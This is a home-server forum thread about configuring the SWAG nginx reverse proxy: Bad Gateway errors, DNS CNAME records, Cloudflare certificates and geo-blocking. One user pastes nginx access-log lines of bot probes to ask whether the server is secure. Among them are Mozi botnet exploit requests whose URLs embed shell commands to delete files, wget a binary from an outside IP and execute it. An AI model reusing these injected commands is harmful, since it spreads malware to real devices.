crusemm Posted January 23, 2021 Share Posted January 23, 2021 Solved it, CNAME in DNS wasn't configured correctly Quote Link to comment
Ryguy Posted January 23, 2021 Share Posted January 23, 2021 5 hours ago, alexandru360 said: Nope ... I backed up all my configs, reset everything to default, cloned only deluge[...].conf and restarted swag and for subdomains I get Bad Gateway ... If someone has an idea I'll be all eyes ... Just a thought: I saw on another thread here a response from 2019 that Nerd Pack might interfere with swag "mojo" ... is this still the case ? Any luck sorting this out??? Quote Link to comment
alexandru360 Posted January 24, 2021 Share Posted January 24, 2021 On 1/23/2021 at 5:54 AM, Ryguy said: Any luck sorting this out??? I uninstalled Nerd Tools ... deleted completely SWAG and reinstalled made all the configurations again and still Bad Gateway ... but the main domain works ... I am confused ... I think I have to investigate what Bad Gateway means for Nginx Quote Link to comment
saarg Posted January 24, 2021 Share Posted January 24, 2021 3 hours ago, alexandru360 said: I uninstalled Nerd Tools ... deleted completely SWAG and reinstalled made all the configurations again and still Bad Gateway ... but the main domain works ... I am confused ... I think I have to investigate what Bad Gateway means for Nginx It means nginx can't connect to the service. So you either have the name/IP/port wrong or not in the same custom bridge as nginx. Quote Link to comment
alexandru360 Posted January 24, 2021 Share Posted January 24, 2021 5 hours ago, saarg said: It means nginx can't connect to the service. So you either have the name/IP/port wrong or not in the same custom bridge as nginx. yep ... that was the problem forgot to switch to the custom docker network Quote Link to comment
talmania Posted January 25, 2021 Share Posted January 25, 2021 (edited) Hi all---I replaced my cache drives the other day and found when i turned back on dockers that nothing was listed at all. So I added back in my templates and that seemed to work just fine save my swag docker. Long story short, I ended up renaming the entire /config folder (which was a LONG time in use from very early letsencrypt days) and and seeing if a complete reinstall worked. Got caught with the rate limit of letsencrypt. Is there a way I can move over the certs that were generated in the old /config structure? Thanks! RESOLVED: In case anyone comes across this I came across a thread about CA Backup/Restore and completely forgot the app was running on my system. Did a restore of everything and it's working perfectly now. Edited January 26, 2021 by talmania Quote Link to comment
Moka Posted January 27, 2021 Share Posted January 27, 2021 Hi, I created a Cloudflare Origin Certificates pem and key. Which folder I need to put them? Quote Link to comment
saarg Posted January 27, 2021 Share Posted January 27, 2021 1 hour ago, Moka said: Hi, I created a Cloudflare Origin Certificates pem and key. Which folder I need to put them? For what? This container handles getting the certs. Quote Link to comment
Moka Posted January 28, 2021 Share Posted January 28, 2021 (edited) 1 hour ago, saarg said: For what? This container handles getting the certs. I want use Swag with Cloudflare in Full (strict). When I enable Full (strict), I get Invalid SSL certificate. Any idea how to fix that? Edited January 28, 2021 by Moka Quote Link to comment
brent3000 Posted January 28, 2021 Share Posted January 28, 2021 Does anyone know if its possible to use SWAG and point it to a VM not to a docker container at all? Looking as the sample configuration, it seems all the info is pointing to a docker container, is it possible to have it point to a VM instead for hosting other non docker applications? Is it even possible or does this only work for containers? Quote Link to comment
JonathanM Posted January 28, 2021 Share Posted January 28, 2021 1 hour ago, brent3000 said: Does anyone know if its possible to use SWAG and point it to a VM not to a docker container at all? Looking as the sample configuration, it seems all the info is pointing to a docker container, is it possible to have it point to a VM instead for hosting other non docker applications? Is it even possible or does this only work for containers? Not entirely sure what you mean, but I reverse proxy sites on multiple vm's and containers on a second unraid using a single instance of swag. It all depends on how your network is set up. If you can access the site using a lan ip and port on a web browser, you likely can reverse proxy it for wan access. Quote Link to comment
brent3000 Posted January 28, 2021 Share Posted January 28, 2021 2 minutes ago, jonathanm said: but I reverse proxy sites on multiple vm's and containers on a second unraid using a single instance of swag. This is what I'm after, If i have a VM running a website (which is access via a local IP, what/how do i build a config or setup so SWAG will direct vm1.domain.com to a VM? All the sample ones are container based examples? or do i just put the VM name in its place? Quote Link to comment
JonathanM Posted January 28, 2021 Share Posted January 28, 2021 1 minute ago, brent3000 said: This is what I'm after, If i have a VM running a website (which is access via a local IP, what/how do i build a config or setup so SWAG will direct vm1.domain.com to a VM? All the sample ones are container based examples? or do i just put the VM name in its place? I don't use the samples, I just set things up like a normal nginx install. I learned from tutorials I searched in google. My personal preference is to keep my sites all in one main config file, with common blocks for repeated lines defined in other config files I reference. My install doesn't follow the included examples. Quote Link to comment
Skylinar Posted January 28, 2021 Share Posted January 28, 2021 I'm trying to get hedgedoc to work with swag reverse proxy, but unfortunately it doesn't work. Has anyone already got it working, if so, could they help with the config for swag/hedgedoc? Quote Link to comment
saarg Posted January 28, 2021 Share Posted January 28, 2021 17 hours ago, Moka said: I want use Swag with Cloudflare in Full (strict). When I enable Full (strict), I get Invalid SSL certificate. Any idea how to fix that? I don't know what full mode is, but if you need to use certs you get from cloudflare, then I don't think it's possible with swag. Join our discord and you can ask there, as there are more people with more knowledge about swag. Quote Link to comment
SockDust Posted January 29, 2021 Share Posted January 29, 2021 Hi guys, I hope someone can help me with this because I've been banging my head against a wall for hours trying to figure out what is going wrong: I followed Spaceinvader One's video on setting up a reverse proxy in unraid, but whenever I attempt to go to any of the addresses that should be pointed to my docker containers I end up at the SWAG landing page ("Welcome to your SWAG instance"). Any thoughts? I really hope it is something obvious, but I've a bad feeling it isn't ... Please probe if I haven't given enough information. 1 Quote Link to comment
sirKitKat Posted January 30, 2021 Share Posted January 30, 2021 On 2/1/2020 at 6:03 AM, Coolsaber57 said: I am trying to expose my Octoprint page, but am having trouble finding a configuration that will work. Here's the examples that Octoprint provides: https://community.octoprint.org/t/reverse-proxy-configuration-examples/1107 Here's my current config: server { listen 443 ssl; listen [::]:443 ssl; server_name print.*; include /config/nginx/ssl.conf; client_max_body_size 0; location / { include /config/nginx/proxy.conf; proxy_pass http://192.168.2.13:80; proxy_set_header Host $http_host; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Scheme $scheme; } } I took out a few lines that were causing the docker container to throw errors. I'm currently getting a 500 error. If I copy a config from another container and change the IP/port/subdomain, I do actually get to see the login page, but it says it's offline and asks me to reconnect. Has anyone successfully configured Octoprint in this container? If so, would you be able to share the config? In the following 50 pages, it seems that there is still no solution to this? (I'm running into the same problem) Quote Link to comment
brent3000 Posted January 30, 2021 Share Posted January 30, 2021 On 1/30/2021 at 4:32 AM, SockDust said: I followed Spaceinvader One's video on setting up a reverse proxy in unraid, but whenever I attempt to go to any of the addresses that should be pointed to my docker containers I end up at the SWAG landing page ("Welcome to your SWAG instance"). Any thoughts? Is there a specific app you are trying to route too? I also followed SI YouTube and it worked a treat, have you checked the log that the domain is clearing correctly or what method are you using (folder or domain level?) Quote Link to comment
blaine07 Posted January 30, 2021 Share Posted January 30, 2021 Is proxy.conf and nginx.conf are files that will regenerate with start up? I know some of the others will but...? Quote Link to comment
ZekerPixels Posted February 1, 2021 Share Posted February 1, 2021 (edited) Hi all, Over the weekend is setup swag and nextcloud, following spaceinvaderone's guides. (https://scan.nextcloud.com/, gives all A+) I got everything working using my own domain (nexcloud.mydomain.com). I'm not a specialist but, so I'm not very confident about the security. So, I decided to let it running for about 20hrs, and check the logs and enter the ips on abuseipdb.com. I filtered all my activities out and am left with 158 lines in ngix log. Here and example: https://www.abuseipdb.com/check/74.120.14.53 https://www.abuseipdb.com/check/180.163.220.5 https://www.abuseipdb.com/check/180.163.220.68 https://www.abuseipdb.com/check/27.115.124.70 https://www.abuseipdb.com/check/192.241.215.11 Next some lines, of which non are from my ips. I understand the GET background, logo, ect. But kerbynet and wget from some ip, don't sound good. GET / HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 POST /GponForm/diag_Form?images/ HTTP/1.1 /tmp/gpon80&ipv=0 POST /boaform/admin/formLogin HTTP/1.1 400 0 - GET /portal/redlion HTTP/1.1 HEAD http://112.124.42.80:63435/ HTTP/1.1 CONNECT 112.124.42.80:443 HTTP/1.1 HEAD http://110.242.68.4/ HTTP/1.1 CONNECT 110.242.68.4:443 HTTP/1.1 POST /HNAP1/ HTTP/1.0 \x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03\x11\xDFJ\x5CN\x8F\xA0\x89[\x9A\x84i=\x8A\x8FA\xEB\x98\xE3\xDB\xFDQ\xD1Iw\xFD\xED HEAD /robots.txt HTTP/1.0 GET /login HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.229.54.251:50078/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 GET /actuator/health HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 OPTIONS / HTTP/1.1 HEAD /epa/scripts/win/nsepa_setup.exe HTTP/1.1 HEAD / HTTP/1.0 GET /cgi-bin/kerbynet?Action=Render&Object=StartSession HTTP/1.1 @\x00\x00\x00y0\x12\xD9\x9E9Q\x90\x8A\xED\xEE`\xCC\xB3\xD6| \x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr GET /hudson HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1 GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.99.138.110:45592/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 GET / HTTP/2.0 http://baidu.com/ GET /login HTTP/2.0 http://baidu.com/ GET / HTTP/2.0 GET /login HTTP/2.0 GET /apps/files_rightclick/css/app.css?v=46c85d58-8 HTTP/2.0 GET /core/css/guest.css?v=c3182750-8 HTTP/2.0 GET /apps/files_videoplayer/js/main.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/files_fileinfo.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/files_client.js?v=c3182750-8 HTTP/2.0 GET /apps/files_sharing/js/dist/main.js?v=c3182750-8 HTTP/2.0 GET /apps/files_pdfviewer/js/files_pdfviewer-public.js?v=c3182750-8 HTTP/2.0 GET /apps/files_rightclick/js/script.js?v=c3182750-8 HTTP/2.0 GET /apps/files_rightclick/js/files.js?v=c3182750-8 HTTP/2.0 GET /apps/theming/js/theming.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/main.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/login.js?v=c3182750-8 HTTP/2.0 GET /js/core/merged-template-prepend.js?v=c3182750-8 HTTP/2.0 GET /core/js/oc.js?v=c3182750 HTTP/2.0 GET /apps/theming/styles?v=8 HTTP/2.0 GET /apps/theming/image/logo?useSvg=1&v=8 HTTP/2.0 GET /apps/accessibility/css/user-a82fd95db10ff25dfad39f07372ebe37 HTTP/2.0 GET /core/img/actions/confirm-white.svg?v=2 HTTP/2.0 GET /core/img/loading-dark.gif HTTP/2.0 GET /core/img/actions/toggle.svg HTTP/2.0 GET /apps/theming/image/logo?v=8 HTTP/2.0 GET /csrftoken HTTP/2.0 GET /apps/theming/image/background?v=8 HTTP/2.0 GET /csrftoken HTTP/2.0 GET /apps/theming/favicon?v=8 HTTP/1.1 GET /csrftoken HTTP/2.0 Are there some obvious things I forgot to do? considering the ip locations, geo blocking wouldn't be a bad idea. I dont leave the country much, so blocking about the whole world exept 2/3 countys would probably be an option. Thanks, edit: found something on geo blocking https://technicalramblings.com/blog/blocking-countries-with-geolite2-using-the-letsencrypt-docker-container/ ofc, running into issues, I'm missing something verry obvious. Edited February 2, 2021 by ZekerPixels Quote Link to comment
Stubbs Posted February 2, 2021 Share Posted February 2, 2021 Is it possible to use multiple DNS plugins for different domains? Quote Link to comment
saarg Posted February 2, 2021 Share Posted February 2, 2021 30 minutes ago, Stubbs said: Is it possible to use multiple DNS plugins for different domains? No Quote Link to comment
007craft Posted February 3, 2021 Share Posted February 3, 2021 (edited) Hi. I was wondering if somebody could help me as I am getting a cert does not exist error. I've so far followed SpaceInvader Ones youtube video up to the point of setting up my DNS Cname records, and forwarding my ports (see pictures below). I am using Google domains as my registar. I am not using duckdns at all. I have a static IP. The red boxes in the picture are all mydomain.com and the purple box is my wan IP. Capture.thumb.PNG.b5c23f40859812d065621b51163fa46d.PNG If I try to RDP into my Windows machine using mydomain.com:3389 or www.mydomain.com:3389 , which are both forwaarded to my IP as "A" records, it works. If I try cloud.mydomain.com:3389 it just fails. Do I need to create an "A" record for cloud. and video. as well? I suppose there was a bit of a disconnect here since the video guide space invader one made talks about using duck DNS, which i'm not using, and im guessing his duckdns config somehow has that setup already for him? Here is my picture of my port forwarding on my router Capture2.thumb.PNG.46b5151a2509e9eb0e2f478676641d2b.PNG Edit: I figured it out. In case anybody sees this in the future, you need to also forward your subdomains to your IP (which is basically creating A records for each, but through the forwarding options on google domains, rather than the custom resource records options), as well as making the Cname records in the custom resource records options, which point to the main domain. Edited February 3, 2021 by 007craft 1 Quote Link to comment
brent3000 Posted February 3, 2021 Share Posted February 3, 2021 On 2/2/2021 at 8:42 AM, ZekerPixels said: I filtered all my activities out and am left with 158 lines in ngix log May i ask where you got this log data from? Just interested to see on mine also My router is getting hit alot by port scans etc all landing on the webserver (80 and 443) but its pretty normal sadly just bots scanning IP ranged trying a bunch of things and then moving on unless they get a hit Quote Link to comment
ZekerPixels Posted February 3, 2021 Share Posted February 3, 2021 9 hours ago, brent3000 said: May i ask where you got this log data from? Just interested to see on mine also My router is getting hit alot by port scans etc all landing on the webserver (80 and 443) but its pretty normal sadly just bots scanning IP ranged trying a bunch of things and then moving on unless they get a hit of course its in /appdata/swag/log/nginx/access.log I understand the bot searching for something unsecured, as long as its secured it doesnt realy do anything. But I'm trying to understand what is happening and I want to be conviced it is secured before actualy using it. And I realy want to have geo blocking working, it doesnt hurt using it and https://www.spamhaus.org/statistics/botnet-cc/ well those get blocked. But kerbynet I mentioned, turns out to be an old router exploit. Quote Link to comment
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.